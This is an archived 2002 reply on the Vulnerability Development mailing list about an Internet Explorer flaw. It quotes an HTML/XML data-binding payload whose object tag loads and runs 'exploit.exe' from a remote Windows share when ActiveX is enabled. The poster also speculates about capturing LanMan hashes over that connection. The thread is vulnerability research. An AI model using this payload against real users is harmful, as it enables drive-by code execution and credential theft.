Vulnerability Development mailing list archives
Re: Rather large MSIE-hole
From: NoCoNFLiC <nocon () castleblack darkflame net>
Date: Fri, 15 Mar 2002 09:52:40 -0600
[jswensson () integres com] Thu, Mar 14, 2002 at 04:23:55PM -0800 wrote:
well if activex is enabled, doing this with a available readable by everyone windows share works <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="\\xxx.xxx.xxx.xxx\share\exploit.exe"></object> ]]> </exploit> </security> </xml>
I could be wrong, but could this also open the posiblity of a "pass the hash" type of attack by sniffing the LanMan hash when the client connects to \\xxx.xxx.xxx.xxx\share\ ? http://online.securityfocus.com/bid/233 -- - nocon ====================================== nocon () darkflame net http://nocon.darkflame.net ======================================
Current thread:
- Re: Rather large MSIE-hole, (continued)
- Re: Rather large MSIE-hole Eric V Brown (Mar 14)
- RE: Rather large MSIE-hole Wall, Kevin (Mar 14)
- Re: Rather large MSIE-hole Paul D. Campbell (Mar 14)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole jon schatz (Mar 14)
- RE: Rather large MSIE-hole Chad Thunberg (Mar 15)
- Re: Rather large MSIE-hole Joerg Over (Mar 15)
- Re: Rather large MSIE-hole KF (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- Re: Rather large MSIE-hole Slow2Show (Mar 14)
- RE: Rather large MSIE-hole John Swensson (Mar 14)
- Re: Rather large MSIE-hole NoCoNFLiC (Mar 15)
- Re: Rather large MSIE-hole The Blueberry (Mar 14)
- RE: Rather large MSIE-hole Keith Tyler (Mar 15)
- Re: Rather large MSIE-hole Slow2Show (Mar 15)
- RE: Rather large MSIE-hole Tiago Halm (Mar 16)